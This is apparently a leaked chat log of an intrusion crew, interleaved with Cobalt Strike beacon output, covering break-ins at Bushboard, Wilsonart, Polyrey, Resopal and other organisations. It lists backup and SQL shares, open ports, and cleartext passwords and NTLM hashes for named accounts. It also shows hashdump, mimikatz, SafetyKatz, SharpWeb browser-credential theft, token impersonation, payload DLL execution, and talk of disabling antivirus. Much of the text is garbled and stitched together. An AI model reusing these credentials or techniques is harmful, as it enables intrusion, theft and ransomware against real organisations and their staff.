    Bushboard Backups Disk
```
Bushboard Backups Disk
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\BespokeTables

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_23_000101_4310632.bak
24/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_24_000101_1575132.bak
25/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_25_000100_9237608.bak
26/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_26_000101_3225660.bak
27/12/2020 00:10 7,077,051,904 BespokeTables_backup_2020_12_27_000101_3078025.bak
               5 File(s) 35,385,259,520 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\DataAnalysis

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_23_000101_5246638.bak
24/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_24_000101_2199136.bak
25/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_25_000100_9861612.bak
26/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_26_000101_3849664.bak
27/12/2020 00:10 14,766,592 DataAnalysis_backup_2020_12_27_000101_3546028.bak
               5 File(s) 73,832,960 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\distribution

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:10 5,399,040 distribution_backup_2020_12_23_000101_5246638.bak
24/12/2020 00:10 5,399,040 distribution_backup_2020_12_24_000101_2199136.bak
25/12/2020 00:10 5,399,040 distribution_backup_2020_12_25_000100_9861612.bak
26/12/2020 00:10 5,399,040 distribution_backup_2020_12_26_000101_4005665.bak
27/12/2020 00:10 5,399,040 distribution_backup_2020_12_27_000101_3702029.bak
               5 File(s) 26,995,200 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ManufacturingDemo

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_23_000101_5870642.bak
24/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_24_000101_2355137.bak
25/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_25_000101_0017613.bak
26/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_26_000101_4161666.bak
27/12/2020 00:14 23,387,529,728 ManufacturingDemo_backup_202020_12_27_000101_3702029.bak
               5 File(s) 116,937,648,640 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ReportServer$CRM

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 694,302,208 ReportServer$CRM_backup_2020_12_23_000101_7898655.bak
24/12/2020 00:14 697,447,936 ReportServer$CRM_backup_2020_12_24_000101_2355137.bak
25/12/2020 00:14 697,447,936 ReportServer$CRM_backup_2020_12_25_000101_0017613.bak
26/12/2020 00:14 696,399,360 ReportServer$CRM_backup_2020_12_26_000101_4161666.bak
27/12/2020 00:14 694,302,208 ReportServer$CRM_backup_2020_12_27_000101_3858030.bak
               5 File(s) 3,479,899,648 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\ReportServer$CRMTempDB

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 23,332,352 ReportServer$CRMTempDB_backup_2020_12_23_000101_8054656.bak
24/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_24_000101_2355137.bak
25/12/2020 00:14 22,283,776 ReportServer$CRMTempDB_backup_2020_12_25_000101_0173614.bak
26/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_26_000101_4317667.bak
27/12/2020 00:14 21,235,200 ReportServer$CRMTempDB_backup_2020_12_27_000101_3858030.bak
               5 File(s) 109,321,728 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\SP2010_Admin_Content

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_23_000101_9458665.bak
24/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_24_000101_2511138.bak
25/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_25_000101_0485616.bak
26/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_26_000101_4473668.bak
27/12/2020 00:14 354,596,352 SP2010_Admin_Content_backup_2020_12_27_000101_4170032.bak
               5 File(s) 1,772,981,760 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
```
 
```
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App\SP2010_config

27/12/2020 01:35 <DIR> .
27/12/2020 01:35 <DIR> .
23/12/2020 00:14 18,001,408 SP2010_config_backup_202020_12_23_000101_9770667.bak
24/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_24_000101_2667139.bak
25/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_25_000101_0641617.bak
26/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_26_000101_4473668.bak
27/12/2020 00:14 18,001,408 SP2010_config_backup_2020_12_27_000101_4170032.bak
               5 File(s) 90,007,040 bytes
               2 Dir(s) 4,194,904,961,024 bytes free
``the chek in labetam like brodcast on all network canhm, but there requires macadr)https://www.depicus.com/wake-on-lan/wake-on-lan-cmduser7user3двоих not enough us all here ?
7/12/2020 01:35 <DIR> BespokeTables
27/12/2020 01:35 <DIR> DataAnalysis
27/12/2020 01:35 <DIR> distribution
27/12/2020 01:35 <DIR> ManufacturingDemo
27/12/2020 01:35 <DIR> ReportServer$CRM
27/12/2020 01:35 <DIR> ReportServer$CRMTempDB
27/12/2020 01:35 <DIR> SP2010_Admin_Content
27/12/2020 01:35 <DIR> SP2010_config
``````
 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App

09/08/2019 15:38 <DIR> .
09/08/2019 15:38 <DIR> .
27/12/2020 01:35 <DIR> A_Winman
27/12/2020 01:35 PM <DIR> BBHoldings
27/12/2020 01:35 PM <DIR> Bdc_Service_DB_aff7f39f8b654700a677cbcc4c641655
27/12/2020 01:35 PM <DIR> BespokeTables
27/12/2020 01:35 <DIR> DataAnalysis
27/12/2020 01:35 <DIR> distribution
27/12/2020 01:35 <DIR> ManufacturingDemo
27/12/2020 01:35 <DIR> ReportServer$CRM
27/12/2020 01:35 <DIR> ReportServer$CRMTempDB
27/12/2020 01:35 <DIR> SP2010_Admin_Content
27/12/2020 01:35 <DIR> SP2010_config
27/12/2020 01:35 <DIR> WinMan
27/12/2020 01:35 <DIR> WinManMaster
27/12/2020 01:35 <DIR> WSS_Content
27/12/2020 01:35 PM <DIR> WSS_Content_5eddefdaf170489fac09efbaa04bc6ed
27/12/2020 01:35 PM <DIR> WSS_Content_704c79658cf640d5a47ca3fd6e902911
27/12/2020 01:35 PM <DIR> WSS_Logging
27/12/2020 01:35 <DIR> WSS_Search_bbdb01
               0 File(s) 0 bytes
              20 Dir(s) 4,194,904,961,024 bytes free
``Please don't forget servers that will be mapped need to be run with the tasklist section we will pull in the trust after turning off the avs we will go there even dll from depatam simantec breaks everything2003 nothing flies out there or something I don't understand ``some bug or something
WI.RWP.COM
srv: / 60
arm: / 515
``Some files you might find interesting, some listings on backups and fileservers)
beacon> shell dir \\BBDC03.bushboard.co.uk\vCenterBackups
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\vCenterBackups
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \BBDC03.bushboard.co.uk\vCenterBackups is Backup of VSphere
 Volume Serial Number is 34A9-AA2B

 Directory of \BBDC03.bushboard.co.uk\vCenterBackups

23/10/2020 13:32 <DIR> .
23/10/2020 13:32 <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 7,410,316,644,352 bytes free

``````
beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server
[*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\SQL_Server
[+] host called home, sent: 70 bytes
[+] received output:
 Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \BBDC03.bushboard.co.uk\SQL_Server

22/08/2019 13:16 <DIR> .
22/08/2019 13:16 <DIR> .
09/08/2019 15:38 <DIR> App
09/08/2019 15:57 <DIR> Sys
               0 File(s) 0 bytes
               4 Dir(s) 4,194,904,961,024 bytes free

beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server\App
[*] Tasked beacon to run: dir \BBDC03.bushboard.co.uk\SQL_Server\App
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \BBDC03.bushboard.co.uk\SQL_Server\App

09/08/2019 15:38 <DIR> .
09/08/2019 15:38 <DIR> .
27/12/2020 01:35 <DIR> A_Winman
27/12/2020 01:35 PM <DIR> BBHoldings
27/12/2020 01:35 PM <DIR> Bdc_Service_DB_aff7f39f8b654700a677cbcc4c641655
27/12/2020 01:35 PM <DIR> BespokeTables
27/12/2020 01:35 <DIR> DataAnalysis
27/12/2020 01:35 <DIR> distribution
27/12/2020 01:35 <DIR> ManufacturingDemo
27/12/2020 01:35 <DIR> ReportServer$CRM
27/12/2020 01:35 <DIR> ReportServer$CRMTempDB
27/12/2020 01:35 <DIR> SP2010_Admin_Content
27/12/2020 01:35 <DIR> SP2010_config
27/12/2020 01:35 <DIR> WinMan
27/12/2020 01:35 <DIR> WinManMaster
27/12/2020 01:35 <DIR> WSS_Content
27/12/2020 01:35 PM <DIR> WSS_Content_5eddefdaf170489fac09efbaa04bc6ed
27/12/2020 01:35 PM <DIR> WSS_Content_704c79658cf640d5a47ca3fd6e902911
27/12/2020 01:35 PM <DIR> WSS_Logging
27/12/2020 01:35 <DIR> WSS_Search_bbdb01
               0 File(s) 0 bytes
              20 Dir(s) 4,194,904,961,024 bytes free

beacon> shell dir \\BBDC03.bushboard.co.uk\SQL_Server\Sys
[*] Tasked beacon to run: dir \BBDC03.bushboard.co.uk\SQL_Server\Sys
[+] host called home, sent: 74 bytes
[+] received output:
 Volume in drive \BBDC03.bushboard.co.uk\SQL_Server is New Volume
 Volume Serial Number is 5A0C-69A2

 Directory of \BBDC03.bushboard.co.uk\SQL_Server\Sys

09/08/2019 15:57 <DIR> .
09/08/2019 15:57 <DIR> .
27/12/2020 01:30 <DIR> master
27/12/2020 01:30 <DIR> model
27/12/2020 01:30 <DIR> msdb
               0 File(s) 0 bytes
               5 Dir(s) 4,194,904,961,024 bytes free
``Listing of these dirs``
dNSHostName: BBDC03.bushboard.co.uk

    Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
    C$ Disk Default share
    E$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    iTop-2.6.1-4463 Disk
    log Disk
    SQL_Server Disk
    U$ Disk Default share
    UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.  
    VBRCatalog Disk
    vCenterBackups Disk
    WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.                                           
    WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.                        
 
```

SQL_Server
The printerBackup, which will be pkv inet software[ ](https://mediaeveryone.com/group/wilsonart-com?msg=ChphJoH4mMpmgKttk) raised and scored, only about the batnick then there was talk and how to make it too `` ``
>description: VMware vCenter 6.0 Server
>operatingSystem: Windows Server 2012 R2 Datacenter
>dNSHostName: dcwas79.Wilsonart.com

    login: fowlerh@wilsonart.com
    paswd: R3f1nn3j2!

    Share name Type Used as Comment
    ----------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    D$ Disk Default share
    IPC$ IPC Remote IPC

    170.7.76.79:5985
    170.7.76.79:3389
    170.7.76.79:636
    170.7.76.79:514
    170.7.76.79:443
    170.7.76.79:389
    170.7.76.79:139
    170.7.76.79:135
    170.7.76.79:88
    170.7.76.79:80
 
>description: Veeam Backup Server
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: dcveeam01.Wilsonart.com

    Share name Type Used as Comment
    ----------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
 
>description: Symantec End Point Management Server
>operatingSystem: Windows Server 2012 Standard
>dNSHostName: DCWAS45.Wilsonart.com

    login: admin
    paswd: pRe1Udlp!

    Share name Type Used as Comment
    ------------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    IPC$ IPC Remote IPC
    print$ Disk Printer Drivers
 
>description: PROD Symantec AntiVirus Management Server
>operatingSystem: Windows Server 2012 Standard
>dNSHostName: FLWAS03.Wilsonart.com

    net view \FLWAS03.Wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 170.7.20.198:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    170.7.20.198:53161
    170.7.20.198:49154
    170.7.20.198:49153
    170.7.20.198:9090
    170.7.20.198:8446
    170.7.20.198:8445
    170.7.20.198:8443
    170.7.20.198:8014
    170.7.20.198:8008
    170.7.20.198:8006
    170.7.20.198:5985
    170.7.20.198:5060
    170.7.20.198:3389
    170.7.20.198:2000
    170.7.20.198:1611
    170.7.20.198:1610
    170.7.20.198:1100
    170.7.20.198:143
    170.7.20.198:139
    170.7.20.198:135
    170.7.20.198:110
    170.7.20.198:80
    170.7.20.198:25
    170.7.20.198:21
 
 
 
 
 
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com

    net view \bod01-vce01.eu.wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 10.40.60.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    10.40.60.70:9443
    10.40.60.70:9087
    10.40.60.70:9084
    10.40.60.70:8084
    10.40.60.70:8008
    10.40.60.70:7444
    10.40.60.70:5580
    10.40.60.70:5480
    10.40.60.70:5060
    10.40.60.70:2020
    10.40.60.70:2015
    10.40.60.70:2014
    10.40.60.70:2012
    10.40.60.70:2000
    10.40.60.70:1514
    10.40.60.70:636
    10.40.60.70:514
    10.40.60.70:443
    10.40.60.70:389
    10.40.60.70:110
    10.40.60.70:88
    10.40.60.70:80
    10.40.60.70:25
    10.40.60.70:21
 
>description: Veeam Backup Server
>operatingSystem: Windows Server 2016 Standard
>dNSHostName: bod01-bkp01.eu.Wilsonart.com

    login: eu.wilsonart.com\svcveeam
    NTLM: 0e7674530ce330128b4425c70fb97f92

    Share name Type Used as Comment
    ----------------------------------------------
    ADMIN$ Disk Remote Admin
    C$ Disk Default share
    D$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    R$ Disk Default share
    V$ Disk Default share
    veeam_agent_ISOs Disk
    W$ Disk Default share
    X$ Disk Default share

    bod01-bkp01.eu.Wilsonart.com:5989
    bod01-bkp01.eu.Wilsonart.com:5985
    bod01-bkp01.eu.Wilsonart.com:3389
    bod01-bkp01.eu.Wilsonart.com:139
    bod01-bkp01.eu.Wilsonart.com:135
    bod01-bkp01.eu.Wilsonart.com:111
    bod01-bkp01.eu.Wilsonart.com:110
    bod01-bkp01.eu.Wilsonart.com:80
    bod01-bkp01.eu.Wilsonart.com:53
    bod01-bkp01.eu.Wilsonart.com:25 (220 bod01-bkp01.eu.wilsonart.com Microsoft ESMTP MAIL Service, Version: 10.0.14393.0 ready at Sat, 26 Dec 2020 19:58:41 +0100 )
    bod01-bkp01.eu.Wilsonart.com:21 (220 Microsoft FTP Service)
    bod01-bkp01.eu.Wilsonart.com:445 (platform: 500 version: 10.0 name: BOD01-BKP01 domain: EU)
 
 
 
 
 
>dNSHostName: nas_signature.polyrey.net

    Share name Type Used as Comment
    ------------------------------------------------
    Archives_Outlook Disk
    Astier Disk
    CALDERA_RIPS Disk
    Depot Disk
    Design Library Disk
    INFO Disk
    IPC$ IPC IPC Service ()
    PROJETS_Signature Disk
    Signature_PAO Disk
    TEST_JFC Disk
    Users_Archives Disk Users_Archives

    172.25.168.64:6281
    172.25.168.64:5001
    172.25.168.64:5000
    172.25.168.64:548
    172.25.168.64:443
    172.25.168.64:139
    172.25.168.64:80
    172.25.168.64:445 (platform: 500 version: 6.1 name: NAS_SIGNATURE domain: POLYREY)
 
 
 
 
 
 
>description: virtuell auf VMware (Win 10)
>operatingSystem: Windows 10 Pro
>dNSHostName: VIPW7700.resopal.lan

    net view \VIPW7700.resopal.lan /all
    Systemfehler 53 aufgetreten.
    Der Netzwerkpfad wurde nicht gefunden.

    Antwort von 172.22.198.250: Zielhost nicht erreichbar.
    Ping-Statistik für 172.22.190.190:
    Pakete: Gesendet = 4, Empfangen = 4, Verloren = 0
    (0% Verlust),

    172.22.198.250:541
    172.22.198.250:443
    172.22.198.250:22 (SSH-2.0-U_fcWc)
 
 
 
 
>operatingSystem: Windows 7 Professional
>dNSHostName: BBBACKUP.bushboard.co.uk

    Ping request could not find host BBBACKUP.bushboard.co.uk. Please check the name and try again.
 
>description: Backup Server
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/BBBK01.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: BBBK01.bushboard.co.uk

    Ping statistics for 2002:c001:147::c001:147:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
 
>operatingSystem: Windows Server 2012 Datacenter
>servicePrincipalName: MSSQLSvc/testmove.bushboard.co.uk:VEEAMSQL2012
>dNSHostName: testmove.bushboard.co.uk

    Ping statistics for 2002:c001:15c::c001:15c:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),
 
>operatingSystem: Windows Server 2016 Standard
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2012
>servicePrincipalName: MSSQLSvc/BBDC03.bushboard.co.uk:VEEAMSQL2016
>dNSHostName: BBDC03.bushboard.co.uk

    Share name Type Used as Comment
    -------------------------------------------------------------------------------
    ADMIN$ Disk Remote Admin
    Bushboard Backups Disk
    C$ Disk Default share
    E$ Disk Default share
    F$ Disk Default share
    IPC$ IPC Remote IPC
    iTop-2.6.1-4463 Disk
    log Disk
    SQL_Server Disk
    U$ Disk Default share
    UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.  
    VBRCatalog Disk
    vCenterBackups Disk
    WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.                                           
    WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.                        
 
>operatingSystem: unknown
>dNSHostName: ltn01-vcenter01.bushboard.co.uk

    Ping statistics for 2002:c001:111::c001:111:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
So the rtcompany has raised the question) so we were not told we needed it yet have a backup server listing prepared?
Live Computers:
 
Wilsonart.com
srv: 128 / 141
arm: 676 / 2587
 


uk.Wilsonart.com
srv: 22 / 25
arm: 44 / 157
 
eu.Wilsonart.com
srv: 36 / 43
arm: 2 / 10
 
uk.Wilsonart.com
srv: 1 / 1

WI.RWP.COM
srv: / 60
arm: / 515
 
SLF.LOCAL
srv: 8 / 10
arm: 49 / 66
 
resopal.lan
srv: 26 / 27
arm: 11 / 100

ralpwilson.com
srv: 1 / 1
 
polyrey.net
srv: 53 / 64
arm: 45 / 340
 
BUSHBOARD.CO.UK
srv: 10 / 17
arm: 26 / 136
 
arborite.com
srv: 9 / 12
arm: 29 / 154
``We'll still ave to disconnectHow about a new clean coba? We're doping and ready to go``
bod01-bkp01.eu.Wilsonart.com (via 445)

    login: eu.wilsonart.com\svcveeam
    NTLM: 0e7674530ce330128b4425c70fb97f92
``````
ukwavcsa1.uk.wilsonart.com
admin.ychang
12Pa$w0rd.
``fuck.
here we had two spheres in europe
# we went into them #
one is metrovaya, the other, as we assumed no snapshots
they fly off to the backup server on the vinda's 12Pa$$w0rd
```
admin.ychang
8af4a85a0c80719d98341961187c81fd
``````
eu.Wilsonart.com\Grelles2
Azerty02
``````
eu.Wilsonart.com\blanchp2
Chloe2019
``petsnashli? So what```
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com

    net view \bod01-vce01.eu.wilsonart.com /all
    System error 53 has occurred.
    The network path was not found.

    Ping statistics for 10.40.60.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    10.40.60.70:9443
    10.40.60.70:9087
    10.40.60.70:9084
    10.40.60.70:8084
    10.40.60.70:8008
    10.40.60.70:7444
    10.40.60.70:5580
    10.40.60.70:5480
    10.40.60.70:5060
    10.40.60.70:2020
    10.40.60.70:2015
    10.40.60.70:2014
    10.40.60.70:2012
    10.40.60.70:2000
    10.40.60.70:1514
    10.40.60.70:636
    10.40.60.70:514
    10.40.60.70:443
    10.40.60.70:389
    10.40.60.70:110
    10.40.60.70:88
    10.40.60.70:80
    10.40.60.70:25
    10.40.60.70:21
``````
resopal.lan\Metzler CN=Backup Operators
Netz_1020


resopal.lan\Chang CN=Backup Operators
99Lustballons!
``````
polyrey.net\Grellety CN=Admin_VCENTER
Polyrey70


polyrey.net\Blanchard CN=Admin_VCENTER
Louanne50
``````
eu.Wilsonart.com\bod01.svc.vcenter
Jupit3r=
```:space_invader:hello allGood eveningXDa said so)Fuck... You say that))) may be rolled and the other pk from your group
Admin:1001:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865:::
the pc group you are sitting on now I do not understand what group you are talking aboutthis Admin account should roll on this group in fact the pc group look at the car which you sit nowsostav in the local admins? and soot in the pc in this groupa try to check Admin through smb login as local admin here misset (` `)
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Admin:1001:aad3b435b51404eeaad3b435b51404ee:39a6957f6260484bd84efa7933501865:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:07b16da56f8d9389b7e093bab1b90983:::

``Handsome man'') +sploit? There is a system by my saved messages from ms outlook
abhinav.bhaskar
chandan koushik.s mohit.goel
nitin.choudhary pritam sudhir
varun vivek.kumar
The command completed successfully.

``Be looking furtherxxm, it's unlikely you'll be able to brute force====== CredEnum ====== what's the group? From seabelt what's the hash?
  Target : LenovoSsoSdkDidToken
  UserName : LenovoSsoSdk
  Password : b9352d67360260a670e5fcea3efebe7faae0b5baabb1339247f07fa2e6b5d0270
  CredentialType : Generic
  PersistenceType : LocalComputer
  LastWriteTime : 13-07-2020 13:59:07

  Target : DeviceMetrics
  UserName : DeviceMetricsUserName
  Password : 0023b668-0ad7-4e6e-aefe-8822e1471728,00002d6ae2381ed4ebd88db03cdc8b991d025b7db8a551556d269716eb1e3352616ea972f08db23cf983371a2ed7fc6c6a2ea7c687a290111e51545c94c5873a
  CredentialType : Generic
  PersistenceType : LocalComputer
  LastWriteTime : 11-12-2019 15:03:33

```
Can you unload it? You're better off) No trusts, can you continue to work in the vault?
beacon> run rundll32 c:\Users\abinash.pattnayak\AppData\Local\Microsoft\XboxLive\AuthStateCache.dll entryPoint
[*] Tasked beacon to run: rundll32 c:\Users\abinash.pattnayak\AppData\Local\Microsoft\XboxLive\AuthStateCache.dll entryPoint
[+] host called home, sent: 116 bytes
I'll give you the dll))) Especially the Indians) It's worth it for me))) happay.in+I'm waiting for you to decide on the "validity" and I'll send you the dll okSnap through the verification view not taken off? macafee by the way not really biting AB
====== AntiVirus ======

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : McAfee VirusScan
  ProductEXE : C:\Program Files\McAfee.com\Agent\mcupdate.exe
  ReportingEXE : C:\Program Files\Common Files\mcafee\mmsshost\MMSSHOST.exe



[*] Completed collection in 0.06 seconds
``okjg look av``.
beacon> make_token JDOSSN\nddevbernst Tractor20!
[*] Tasked beacon to create a token for JDOSSN\nddevbernst
[+] host called home, sent: 47 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
 
beacon> shell dir \\10.28.92.108$
[*] Tasked beacon to run: dir \10.28.92.108$
[+] host called home, sent: 52 bytes
[+] received output:
We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential.
``There is a session in the cob.
From the input pc you can see 15 machines (42 in total), the network has only servers(2008-2019)
445, skul, ftp and web ports are closed
The user apparently does not use the account for a long time or only uses the Citrix web interface, since his files are gone from the word at all.
There is only one DA on the net and his kerb is there
Search for files, balls, etc. did not give anything (browser is not used and the password keeper is also not)
Gpp,zerologon - bypassed
Mass scan on what is next to the network by mask did not give anything, except for those that are already lit before
No way to understand - tried all the lpe exploits from msf'aTell me one last message what's done so farIt's the same
None of the exploits worked.
Give me a new one)and then give me a new oneEven 15 minutes for the checkpoint I can't get to the lpe exploits in the msf
nothing works, a lot of lpe failed for the reason that the wine server and not 10 and so on here we have what? then think about it and if you miss give replacement lpe and whine not found anything with the 445 port
in the plans to continue lpe chisel soon will come as usual waiting for an hour but for the future, we need to look for a admin cuda, so far so) and already have something to go?) some serious avtut carefully oooh what AV?[ ](https://mediaeveryone.com/group/pkgprod?msg=SKZBNqfdN6jjNDciK) is it like?and you found yes? but it's tomorrow or through vmik startup suggest to make a balloon and throw there dllv decided to make a mold of the system and deploy locally?)) what do you have there at all for 4gb? then write to the address) 104....140 yours? 200 mb * and moreover files over 200 gb in a compressed state are not downloaded through kobufiles over 50 meters are archived you there what you download in general?
user2-2 beacon> download C:\ProgramData\trustdmp_17.txt
[*] Tasked beacon to download C:\ProgramData\trustdmp_17.txt
[+] host called home, sent: 70 bytes
[-] File 'C:\ProgramData\trustdmp_17.txt' is either too large (>4GB) or size check failed
´´and the sabnetters took it away?´´(https://mediaeveryone.com/channel/general?msg=HsR2bCoAz5ywv56vK) @tl1call dept plz, otherwise he won´t answer again.´´
a couple of shellcodes were sent to him to bypass simantecrelease give me a sign of life that I'm not writing to myselfnado urgently make #1-done-rtpcompany-com priority now104.....69 coba there are still alive
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
rtpco.local
``but it's old, you need to update all the access info in the confidenc inopnomdidic+user? and so? i don't see any new sessions in it, i don't see your cobuternicus.com
74.118.138.118demain kobaNo flylel or give me a psh stager i'll throw in my koba want dll@user3 load go) thank you`waterway.com` do the confab please`z3 will be on #wilsonart-com now i'll prepare the second grid to work, who will take over?[ ](https://mediaeveryone.com/channel/general?msg=oR3f2Th2ZEpq7J4DW) Yes you can of course still look for cna as an option)can be in the note of each color to assign a symbol :zany_face:as far as I know you can not)to be beautiful? =))))) i think not@tl1 @tl2 in the cob can you implement sorting sessions by color? network seems to be small, accesses and work YES right on the point of entrypointe1 network so far give silkodia in the confab screenshots kidalnetesessions did not fall off? ok, and what about yesterday's session? it is not really scrambled anything yet with wilsonart to work later or give dll?@tl1 where to yank those 2 sessions with YES ?helloprivodestvo:space_invader:see you tomorrow)goodnight)ehGoodnightnightnightnight tomorrow that is today all goodnight do not forget that tomorrow at 5 there will probably cross with quarantine)look DNS WSUS / SCCM servers in all trusts got through kst except quarantine I do not understand, we burned that `` or something ``
beacon> shell ping LRH-NESSUS01.lrhc.local
[*] Tasked beacon to run: ping LRH-NESSUS01.lrhc.local
[+] host called home, sent: 59 bytes
[+] received output:
Ping request could not find host LRH-NESSUS01.lrhc.local. Please check the name and try again.

``````
dn:CN=LRH-NESSUS01,OU=LRHC Servers,DC=lrhc,DC=local
``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (All Users) ===

  [X] Exception: Could not find a part of the path 'C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data'.


=== Checking for Firefox (All Users) ===



=== Checking Windows Vaults ===

[-] Invoke_3 on EntryPoint failed.
``He's got it from Sharprome and what's that?
C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data,https://support.lrhc.org/,https://support.lrhc.org/,9/7/2017 12:27:56 PM,13149278876245510,,MasterKey needed - {12d56280-2898-47c4-ba2c-aaf64ced6463}
C:\Users\cmelliott\AppData\Local\Google\Chrome\User Data\Default\Login Data,http://lansweeper.lrhc.local/,http://lansweeper.lrhc.local/,9/7/2017 2:11:31 PM,13149285091430011,,MasterKey needed - {12d56280-2898-47c4-ba2c-aaf64ced6463}

``?'' mail accesses nothing interesting there can be accesses from accountsdump browser then from winlogon exactly the same as in winlogon?
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SafetyKatz.exe
[*] Tasked beacon to run .NET program: SafetyKatz.exe
